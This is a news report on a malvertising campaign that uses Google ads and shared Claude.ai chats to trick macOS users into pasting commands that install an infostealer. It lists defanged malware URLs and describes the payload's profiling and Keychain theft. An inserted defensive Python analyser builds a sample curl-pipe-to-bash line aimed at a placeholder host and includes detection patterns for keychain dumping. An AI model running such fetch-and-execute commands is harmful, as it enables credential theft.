Hackers abuse Google ads, Claude.ai chats to push Mac malware

Attackers are abusing Google Ads and legitimate Claude.ai shared chats in an active campaign that pushes malware to macOS users.
Users searching for "Claude mac download" may encounter sponsored search results that list claude.ai as the destination, but which lead to a shared chat containing commands that install malware on their Mac.

(BleepingComputer)
Claude shared chats crafted to target macOS users
The campaign was spotted by Berk Albayrak, a security engineer at Trendyol Group, who shared his findings on LinkedIn.

Albayrak identified a shared Claude.ai chat that presented itself as an official installation guide for "Claude Code on Mac" under the name "Apple Support."
The chat prompts users to open Terminal and paste a command, which silently downloads and executes malware on their Mac.
While trying to confirm Albayrak's findings, BleepingComputer came across a second shared Claude chat carrying out the same attack with completely different infrastructure.
The two chats follow the same structure and social engineering approach but use different infrastructure and payloads. Both were publicly accessible at the time of writing:

(BleepingComputer)
What does the macOS malware do?
The base64-encoded commands shown in the shared Claude chats decode to a fetch of a shell script from domains like these:
- The variant observed by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
- The variant spotted by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d
'loader.sh' (served by the second link above) is a further set of shell commands, gzip-compressed:

(BleepingComputer)
This compressed shell script runs entirely in memory, leaving little footprint on disk.
BleepingComputer observed the server returning a differently obfuscated version of the payload on each request (so-called polymorphic delivery), making it difficult for security tools to flag the download by a known hash or signature.
The variant identified by BleepingComputer starts by checking whether the machine has Russian or other CIS-region keyboard input sources configured. If it does, the script exits without doing anything, silently pinging a "cis_blocked" status to the attacker's server on the way out. Only devices that pass this check receive the next stage:

Before proceeding, the script also collects the victim's external IP address, hostname, OS version and keyboard layout and sends them to the attacker. Profiling victims before delivering the payload suggests the operators are selective about whom they target.
The script then pulls the second-stage payload and runs it through osascript, macOS's built-in scripting engine. This lets the attacker execute remote code without dropping a regular application bundle or binary on disk.
The variant identified by Albayrak, however, appears to skip the profiling steps and goes straight to execution.
It harvests browser data, cookies and macOS Keychain contents, packages them up and sends them to the attacker's server. Albayrak identified this as a variant of the MacSync macOS infostealer:
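As an added example (not code from the article, from Albayrak, or from any of the parties named), the following Python script does the analysis a defender would do with one of these "paste into Terminal" one-liners: it peels the base64 and gzip layers off a pasted command, flags the behaviours described above (a download piped straight into a shell, osascript execution) in the recovered script, and hashes both the outer blob and the final script. The sample loader text, the loader.example hostname and the keyboard/keychain indicator strings are constructed for illustration; the page does not say how the real loader implements its checks.

```python
import base64
import binascii
import gzip
import hashlib
import re
from typing import Dict, List, Optional

# Constructed sample script standing in for the kind of loader the article describes:
# a download piped into a shell, then a second stage run through osascript.
# It is NOT the real loader; the hostname is a placeholder.
SAMPLE_INNER = (
    "#!/bin/bash\n"
    "curl -fsSL https://loader.example/debug/loader.sh | bash\n"
    "osascript -e 'do shell script \"echo stage2\"'\n"
)

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
GZIP_MAGIC = b"\x1f\x8b"

# Heuristic indicators checked against the innermost decoded layer. The first two follow the
# behaviour described in the article; the remaining strings are assumed, illustrative patterns
# a profiling or stealer stage might contain, not something taken from the real samples.
INDICATORS = {
    "download_piped_to_shell": re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba|z)?sh\b"),
    "osascript_exec": re.compile(r"\bosascript\b"),
    "nested_base64_decode": re.compile(r"\bbase64\s+(-d|-D|--decode)\b"),
    "keyboard_layout_probe": re.compile(r"HIToolbox|AppleEnabledInputSources", re.I),
    "keychain_access": re.compile(r"\bsecurity\s+(find-generic-password|dump-keychain)\b"),
}


def make_pasted_command(inner: str, mtime: int) -> str:
    """Build a constructed 'paste this into Terminal' one-liner: gzip, base64, decode-and-run.
    A different gzip mtime changes the outer bytes without touching the inner script."""
    blob = base64.b64encode(gzip.compress(inner.encode(), mtime=mtime)).decode()
    return f"echo {blob} | base64 -d | gunzip | bash"


def _looks_like_text(raw: bytes) -> Optional[str]:
    """Accept a decoded layer only if it is mostly printable UTF-8 (i.e. script text)."""
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    printable = sum(ch.isprintable() or ch in "\n\r\t" for ch in text)
    return text if text and printable / len(text) > 0.95 else None


def unwrap(command: str, max_depth: int = 8) -> List[str]:
    """Peel base64 (and gzip) layers off a pasted command. Returns every layer, outermost first."""
    layers = [command]
    for _ in range(max_depth):
        decoded = None
        for token in B64_TOKEN.findall(layers[-1]):
            try:
                raw = base64.b64decode(token, validate=True)
            except (binascii.Error, ValueError):
                continue
            if raw.startswith(GZIP_MAGIC):
                try:
                    raw = gzip.decompress(raw)
                except (OSError, EOFError):
                    continue
            decoded = _looks_like_text(raw)
            if decoded is not None:
                break
        if decoded is None:
            break
        layers.append(decoded)
    return layers


def analyze(command: str) -> Dict[str, object]:
    """Unwrap a pasted command and report indicators plus hashes of the outer and final layers."""
    layers = unwrap(command)
    final = layers[-1]
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(final))
    return {
        "depth": len(layers) - 1,
        "final_script": final,
        "indicators": hits,
        "outer_sha256": hashlib.sha256(command.encode()).hexdigest(),
        "final_sha256": hashlib.sha256(final.encode()).hexdigest(),
    }


if __name__ == "__main__":
    a = analyze(make_pasted_command(SAMPLE_INNER, mtime=1))
    b = analyze(make_pasted_command(SAMPLE_INNER, mtime=2))
    print("indicators:", a["indicators"])
    print("outer hashes differ:", a["outer_sha256"] != b["outer_sha256"])
    print("final hashes match:", a["final_sha256"] == b["final_sha256"])
```

Two wrappings of the same inner script with different gzip timestamps produce different outer hashes but the same hash for the recovered script, which is the point of the polymorphic delivery described above: a block list keyed on the pasted blob or the served file misses the next variant, while a rule on the decoded behaviour (download piped into a shell, osascript) still fires.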

(BleepingComputer)
Fast internet[.]com, shown above in the variant identified by Albayrak, appeared to be down at the time of writing.
When a legitimate URL is a threat
Malvertising has become a recurring delivery method for malware.
BleepingComputer has previously reported on similar campaigns targeting users looking for software such as GIMP, where a convincing Google ad would list a legitimate-looking domain but instead take visitors to a phishing site.
This campaign reverses that: there is no fake site to be seen.
Both Google ads seen here point to the genuine Anthropic site, claude.ai, because the attackers host their malicious instructions within Claude's shared chat feature. The URL in the ad is real.
This is not the first time attackers have abused an AI platform's shared chats in this way. In December, BleepingComputer reported a similar campaign targeting ChatGPT and Grok users.
Users should go directly to claude.ai to download the native Claude app rather than clicking sponsored search results. Claude Code, Anthropic's official CLI, is documented in Anthropic's official documentation and does not require pasting commands from a shared chat.
It’s good practice to handle any instructions that ask you to paste terminal commands with care, regardless of where those commands appear.
BleepingComputer reached out to Anthropic and Google for comment ahead of publication.



